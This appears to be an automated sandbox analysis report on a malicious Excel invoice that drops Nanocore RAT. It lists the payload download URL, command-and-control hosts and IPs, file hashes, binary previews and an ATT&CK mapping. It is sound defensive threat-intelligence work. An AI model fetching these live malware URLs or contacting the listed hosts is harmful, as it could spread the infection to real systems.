ueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
Source: Yara match	File source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_004F256E bind,		7_2_004F256E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_004F253B bind,		7_2_004F253B

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Scheduled Task/Job1	Extra Window Memory Injection1	Disable or Modify Tools1	Input Capture11	File and Directory Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Boot or Logon Initialization Scripts	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	LSASS Memory	System Information Discovery14	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Logon Script (Windows)	Process Injection312	Obfuscated Files or Information31	Security Account Manager	Security Software Discovery11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Scheduled Task/Job1	Software Packing13	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Extra Window Memory Injection1	LSA Secrets	Virtualization/Sandbox Evasion21	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading112	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol222	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion21	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection312	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx	29%	Virustotal		Browse
SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx	23%	ReversingLabs	Document-Office.Exploit.Heuristic

Dropped Files

Source	Detection	Scanner	Link
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\gmSlQSien.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	0%	Metadefender	Browse
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
7.2.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen		Download File
7.2.RegSvcs.exe.840000.3.unpack	100%	Avira	TR/NanoCore.fadte		Download File

Domains

Source	Detection	Scanner	Label	Link
covid19vaccinations.hopto.org	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
nassiru1155.ddns.net	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://covid19vaccinations.hopto.org/nano.exe	13%	Virustotal		Browse
http://covid19vaccinations.hopto.org/nano.exe	100%	Avira URL Cloud	malware
79.134.225.30	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
covid19vaccinations.hopto.org	13.235.115.155	true	true	2%, Virustotal, Browse	unknown
nassiru1155.ddns.net	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
nassiru1155.ddns.net	true	Avira URL Cloud: safe	unknown
http://covid19vaccinations.hopto.org/nano.exe	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
79.134.225.30	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	vbc.exe, 00000004.00000002.2202209803.0000000005540000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2395892834.0000000004FE0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000004.00000002.2202209803.0000000005540000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2395892834.0000000004FE0000.00000002.00000001.sdmp	false		high
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
13.235.115.155	covid19vaccinations.hopto.org	United States		16509	AMAZON-02US	true
79.134.225.30	unknown	Switzerland		6775	FINK-TELECOM-SERVICESCH	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385193
Start date:	12.04.2021
Start time:	08:01:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@9/29@15/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 1.7% (good quality ratio 1.1%) Quality average: 41.9% Quality standard deviation: 34.8%
HCA Information:	Successful, ratio: 97% Number of executed functions: 466 Number of non-executed functions: 28
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:02:19	API Interceptor	68x Sleep call for process: EQNEDT32.EXE modified
08:02:23	API Interceptor	24x Sleep call for process: vbc.exe modified
08:02:25	API Interceptor	1x Sleep call for process: schtasks.exe modified
08:02:31	API Interceptor	1206x Sleep call for process: RegSvcs.exe modified
08:02:35	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
79.134.225.30	TSskTqG9V9.exe	Get hash	malicious	Browse
	Files Specification.xlsx	Get hash	malicious	Browse
	J62DQ7fO0b.exe	Get hash	malicious	Browse
	oE6O5K1emC.exe	Get hash	malicious	Browse
	AIC7VMxudf.exe	Get hash	malicious	Browse
	Payment Confirmation.exe	Get hash	malicious	Browse
	JOIN.exe	Get hash	malicious	Browse
	Itinerary.pdf.exe	Get hash	malicious	Browse
	vVH0wIFYFd.exe	Get hash	malicious	Browse
	GWee9QSphp.exe	Get hash	malicious	Browse
	s7pnYY2USl.jar	Get hash	malicious	Browse
	s7pnYY2USl.jar	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Generic.dc.exe	Get hash	malicious	Browse
	Import and Export Regulation.xlsx	Get hash	malicious	Browse
	BBdzKOGQ36.exe	Get hash	malicious	Browse
	BL.exe	Get hash	malicious	Browse
	Payment Invoice.exe	Get hash	malicious	Browse
	Payment Invoice.pdf.exe	Get hash	malicious	Browse
	Inquiries_scan_011023783591374376585.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
covid19vaccinations.hopto.org	Files Specification.xlsx	Get hash	malicious	Browse	34.220.10.254
covid19vaccinations.hopto.org	APR 21SOA.xlsx	Get hash	malicious	Browse	144.168.163.101

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
FINK-TELECOM-SERVICESCH	OjAJYVQ7iK.exe	Get hash	malicious	Browse	79.134.225.112
	TSskTqG9V9.exe	Get hash	malicious	Browse	79.134.225.30
	Files Specification.xlsx	Get hash	malicious	Browse	79.134.225.30
	J62DQ7fO0b.exe	Get hash	malicious	Browse	79.134.225.30
	oE6O5K1emC.exe	Get hash	malicious	Browse	79.134.225.30
	zunUbtZ2Y3.exe	Get hash	malicious	Browse	79.134.225.40
	EASTERS.exe	Get hash	malicious	Browse	79.134.225.118
	LIST OF POEA DELISTED AGENCIES.pdf.exe	Get hash	malicious	Browse	79.134.225.9
	AWB.pdf.exe	Get hash	malicious	Browse	79.134.225.102
	AIC7VMxudf.exe	Get hash	malicious	Browse	79.134.225.30
	9mm case for ROYAL METAL INDUSTRIES 3milmonth Specification drawings.exe	Get hash	malicious	Browse	79.134.225.21
	PO50164.exe	Get hash	malicious	Browse	79.134.225.79
	Fast color scan to a PDFfile_1_20210331084231346.pdf.exe	Get hash	malicious	Browse	79.134.225.102
	n7dIHuG3v6.exe	Get hash	malicious	Browse	79.134.225.92
	F6JT4fXIAQ.exe	Get hash	malicious	Browse	79.134.225.92
	order_inquiry2094.xls.exe	Get hash	malicious	Browse	79.134.225.102
	5H957qLghX.exe	Get hash	malicious	Browse	79.134.225.25
	yBio5dWAOl.exe	Get hash	malicious	Browse	79.134.225.7
	wDIaJji4Vv.exe	Get hash	malicious	Browse	79.134.225.7
	DkZY1k3y9F.exe	Get hash	malicious	Browse	79.134.225.23
AMAZON-02US	remittance info.xlsx	Get hash	malicious	Browse	52.59.165.42
	Required Order Quantity.xlsx	Get hash	malicious	Browse	52.59.165.42
	PROFORMA INVOICE.exe	Get hash	malicious	Browse	108.128.238.226
	Proforma Invoice.xlsx	Get hash	malicious	Browse	18.184.197.212
	Payment advice IN18663Q0031139I.xlsx	Get hash	malicious	Browse	52.59.165.42
	NEW ORDER.xlsx	Get hash	malicious	Browse	52.59.165.42
	Purchase Order SC_695853.xlsx	Get hash	malicious	Browse	52.59.165.42
	winlog.exe	Get hash	malicious	Browse	3.14.206.30
	J6wDHe2QdA.exe	Get hash	malicious	Browse	3.22.15.135
	hsOBwEXSsq.exe	Get hash	malicious	Browse	3.142.167.54
	1B4AF276CB3E0BFC9709174B8F75E13C4B224F4B35A6E.exe	Get hash	malicious	Browse	3.13.191.225
	36ne6xnkop.exe	Get hash	malicious	Browse	99.83.185.45
	1ucvVfbHnD.exe	Get hash	malicious	Browse	3.13.255.157
	Wire Transfer Update.exe	Get hash	malicious	Browse	3.13.255.157
	Five.exe	Get hash	malicious	Browse	52.84.150.34
	Pd0Tb0v0WW.exe	Get hash	malicious	Browse	52.58.78.16
	Alexandra38.docx	Get hash	malicious	Browse	65.9.66.79
	Alexandra38.docx	Get hash	malicious	Browse	65.9.66.79
	LtfVNumoON.exe	Get hash	malicious	Browse	13.56.33.8
	mW07jhVxX5.exe	Get hash	malicious	Browse	35.157.204.206

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	69JCWICJ9872001.exe	Get hash	malicious	Browse
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Proforma 0089 05 2019.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\SMTP Service\smtpsvc.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.7499114035101173
Encrypted:	false
SSDEEP:	384:DOj9Y8/gS7SDriLGKq1MHR534Jg6ihJSxUCR1rgCPKabK2t0X5P7DZ+JgySW7XxW:D+gSAdN1MH3IJFRJngyX
MD5:	72A9F09010A89860456C6474E2E6D25C
SHA1:	E4CB506146F60D01EA9E6132020DEF61974A88C3
SHA-256:	7299EB6E11C8704E7CB18F57879550CDD88EF7B2AE8CBA031B795BC5D92CE8E3
SHA-512:	BCD7EC694288BAF751C62E7CE003B4E932E86C60E0CFE67360B135FE2B9EB3BCC97DCDB484CFC9C50DC18289E824439A07EB5FF61DD2C2632F3E83ED77F0CA37
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 69JCWICJ9872001.exe, Detection: malicious, Browse Filename: Proforma 0089 05 2019.xlsx, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..S.................P... .......k... ........@.. ...............................X....@..................................k..K................................... k............................................... ............... ..H............text....K... ...P.................. ..`.rsrc................`..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	802304
Entropy (8bit):	7.807064216316379
Encrypted:	false
SSDEEP:	12288:fqPhNb1Cpc0vs3YpRTYmuCBWhfCfyxmbKzYwafnJMKrXe3tw2luRVZzQKaq:iPhxcpHUIpRTY0c1uyUeU3nJMKoCaq
MD5:	A3CBEB3E732B11954572B3EE6755242C
SHA1:	EBB41B49DE8F1B09EA20DABFFCFD85B93B68D7F3
SHA-256:	E006460AD1E34DDBBC28430C2D529A7EE491893C7AE8B6902B2D8D8C56620510
SHA-512:	455C3CAE5F85B8F3334004E09C5EF42BB6E8410F7501AEF0D520E1023EB376E31D6FA892DAB8DC8AAEA94914F31EC7915E8424362F1046F25F9B55C58EF94BD6
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://covid19vaccinations.hopto.org/nano.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..2...........P... ...`....@.. ....................................@.................................@P..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............<..............@..B................tP......H........}..du...............]...........................................0............(....(..........(.....o .........................(!......("......(#......($......(%....N..(....o....(&....&..('.....s(........s)........s........s+........s,............0...........~....o-....+...0...........~....o.....+...0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+...0......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27A56AD2.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	51166
Entropy (8bit):	7.767050944061069
Encrypted:	false
SSDEEP:	1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5:	8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1:	85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256:	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512:	F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...\|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29AF82FC.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
Category:	dropped
Size (bytes):	29499
Entropy (8bit):	7.667442162526095
Encrypted:	false
SSDEEP:	384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
MD5:	4FBDDF16124B6C9368537DF70A238C14
SHA1:	45E34D715128C6954F589910E6D0429370D3E01A
SHA-256:	0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
SHA-512:	EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\365FCBB7.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4132FFE5.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1316
Entropy (8bit):	3.0840340624796188
Encrypted:	false
SSDEEP:	24:YWLj/Bu99sA0D4U799D1sIyVk3/wKivaHRS2:hLbVeITmak2
MD5:	BE9229401B6EC704E0AFF008FF066918
SHA1:	5408CAA831484E21A7B4A56317D5DF8566D0222D
SHA-256:	2CE1B2D517721F60C9086DEEBB9093BDA2BDA8B66F34D20DC3270C91D439711A
SHA-512:	09C0C8779AEB6C9121D4A4CEF8330051A178FB656DB162238CE9776B908087A00F08B2781491C45E0C3256AB0EE32594D93A37361EFA3F0E6F481148600B9EEB
Malicious:	false
Preview:	....l................................... EMF....$.......................V...........................fZ..U"..F...4...&...GDIC........o4.f..............................................................................-.........!..................................................................................@..Calibri..#.7..K.h."..Iww@.zw2.f.....-.................2.................Label1................'.......................................................................................!.......'.......................%...........L...d...................................!..............?...........?....................................................................................................R...p................................@..C.a.l.i.b.r.i.................................................................zw..........................K....../L.,."...K...=......;........G...........=../=......3L...=...L...K.......=.........4.".......=..3L.4."..]]w.]]w... .....L=...=. .K.............

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5394A5DD.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 199 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4740
Entropy (8bit):	7.917839815538774
Encrypted:	false
SSDEEP:	96:oAnIkq3L3l05ZEpmgsv0Q3UtPwkCYHMYPhcky7JcO7dY/:oAnz15qhsrUtPwYHtPhOZ7dY/
MD5:	493B0785A76407BFBD3983964D9EA288
SHA1:	D4F7298439073EA125F7EE9C415091EF8C71FE01
SHA-256:	CDAD5DACB34C7C421ADE9645520051A1620E32DBB41990CF05C3D6BABC9BC1ED
SHA-512:	A343C143BFCC69B5AEEF78DEE567F80769541861310D7A3F4985AADE428F3D47B29228857A1A0FFC7F54E4E88699014253DCD06554ABE586953750685F37A550
Malicious:	false
Preview:	.PNG........IHDR.......~........,....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..!...!..........IDATx^..r...5W.._..~...\|.......P...#...M ).-R6ER.%j4.......}..n.......46z...H....I.d...2OU..u...F...../.....H......../4...Q"..)`.....T-..v)....j...J.b.....L..x....T......F....m....PB...x<..N...%."q[j..\./--...\|...Q..2..;...{p..q..p.w.....n.......?...%\|2..\......R..`..t1....46%..Z."...f..U.X....MaO......)...O.:.Vo.z..&.D<....o...'....}...i...\|...b1.T.t:...G.~.`..0q..F..6..W.D.R..+...O.V......7...}..?P....P4..........^........6W...J..R.l...H...d..= V.M...)..U.V....".h0..ds..F".x<......hy...m.v{...O....Zhw.()W.X......U.....Z.2[K.R.p4....;L$S..\| ..GS.f...\|......\|?.M.2.z.=[oa).k.F;_.E..l7Z..Ko(.....t..H_.T.m..0.).;=T.7;X..s....\|.Nx z.....$.....Yn..Ff.n...Q..x..l'......s...L......X".\|6_..#8=<....[..H.^X.'..I.n .B.b..o.Z.3(........S..2.Xc....T.5.jk 2.....[B..8-3..*+_n..,S2...G.T.tG..G.O...0......p$..:.. .F.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A7818AB.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
